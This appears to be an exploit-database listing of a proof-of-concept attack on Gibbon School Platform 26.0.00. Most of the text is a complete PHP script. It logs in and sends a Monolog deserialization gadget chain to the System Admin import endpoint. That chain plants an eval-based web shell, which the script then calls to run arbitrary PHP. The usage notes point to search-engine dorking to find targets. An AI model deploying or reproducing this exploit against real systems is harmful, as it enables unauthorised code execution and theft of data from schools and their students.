Exploit for Gibbon School Platform 26.0.00 Code Injection

Name: Exploit for Gibbon School Platform 26.0.00 Code Injection
Rating: 5 (222 reviews)
2024-10-11 | CVSS 7.4
## https://sploitus.com/exploit?id=PACKETSTORM:182149
=============================================================================================================================================  
| # Title : Gibbon School Platform 26.0.00 Code Injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://gibbonedu.org/ |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] uses the CURL to Allow remote command .  
  
[+] Line 108 set your target .  
  
[+] save code as poc.php .  
  
[+] USage : cmd => c:\www\test\php poc.php   
  
[+] PayLoad :  
  
  
<?php  
  
class GibbonExploit  
{  
private $target_uri;  
private $username;  
private $password;  
private $webshell_name;  
  
public function __construct($target_uri, $username, $password, $webshell_name = null)  
{  
$this->target_uri = $target_uri;  
$this->username = $username;  
$this->password = $password;  
$this->webshell_name = $webshell_name ?: $this->randomString() . '.php';  
}  
  
private function send_request($method, $url, $data = null, $headers = [])  
{  
$ch = curl_init();  
  
curl_setopt($ch, CURLOPT_URL, $url);  
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);  
if ($data) {  
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);  
}  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  
  
if (!empty($headers)) {  
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);  
}  
  
$response = curl_exec($ch);  
curl_close($ch);  
  
return $response;  
}  
  
public function gibbon_login()  
{  
$login_url = $this->target_uri . '/login.php?timeout=true';  
$data = [  
'address' => '',  
'method' => 'default',  
'username' => $this->username,  
'password' => $this->password,  
'gibbonSchoolYearID' => '025',  
'gibboni18nID' => '0002'  
];  
  
return $this->send_request('POST', $login_url, http_build_query($data));  
}  
  
private function construct_form_data($payload)  
{  
$payload_len = strlen($payload);  
$payload_data = 'a:2:{i:7;O:32:"Monolog\\Handler\\SyslogUdpHandler":1:{s:9:"\x00*\x00socket";O:29:"Monolog\\Handler\\BufferHandler":7:{s:10:"\x00*\x00handler";r:3;s:13:"\x00*\x00bufferSize";i:-1;s:9:"\x00*\x00buffer";a:1:{i:0;a:2:{i:0;s:' . $payload_len . ':"' . $payload . '";s:5:"level";N;}}s:8:"\x00*\x00level";N;s:14:"\x00*\x00initialized";b:1;s:14:"\x00*\x00bufferLimit";i:-1;s:13:"\x00*\x00processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}i:7;i:7;}';  
  
$form_data = [  
'address' => '/modules/System Admin/import_run.php',  
'mode' => 'sync',  
'syncField' => 'N',  
'syncColumn' => '',  
'columnOrder' => $payload_data,  
'columnText' => 'N;',  
'fieldDelimiter' => '%2C',  
'stringEnclosure' => '%22',  
'filename' => $this->randomString() . '.xlsx',  
'csvData' => '"External Assessment","Assessment Data","Student","Field Name","Category","Field Name","Result"',  
'ignoreErrors' => '1',  
'Failed' => 'Submit'  
];  
  
return $form_data;  
}  
  
public function upload_webshell($b64_payload)  
{  
$php_payload = "echo \"<?php @eval(base64_decode('$b64_payload'));?>\" > " . $this->webshell_name;  
$form_data = $this->construct_form_data($php_payload);  
  
$url = $this->target_uri . '/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4';  
return $this->send_request('POST', $url, http_build_query($form_data));  
}  
  
public function execute_php($cmd)  
{  
$b64_payload = base64_encode($cmd);  
$res = $this->upload_webshell($b64_payload);  
  
if (!$res) {  
die('Web shell upload error.');  
}  
  
// execute the webshell  
$url = $this->target_uri . '/' . $this->webshell_name;  
return $this->send_request('GET', $url);  
}  
  
private function randomString($length = 10)  
{  
return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length);  
}  
}  
  
// Usage  
$exploit = new GibbonExploit('https://target-site.com', 'username@example.com', 'password');  
$exploit->gibbon_login();  
$response = $exploit->execute_php('phpinfo();');  
echo $response;  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================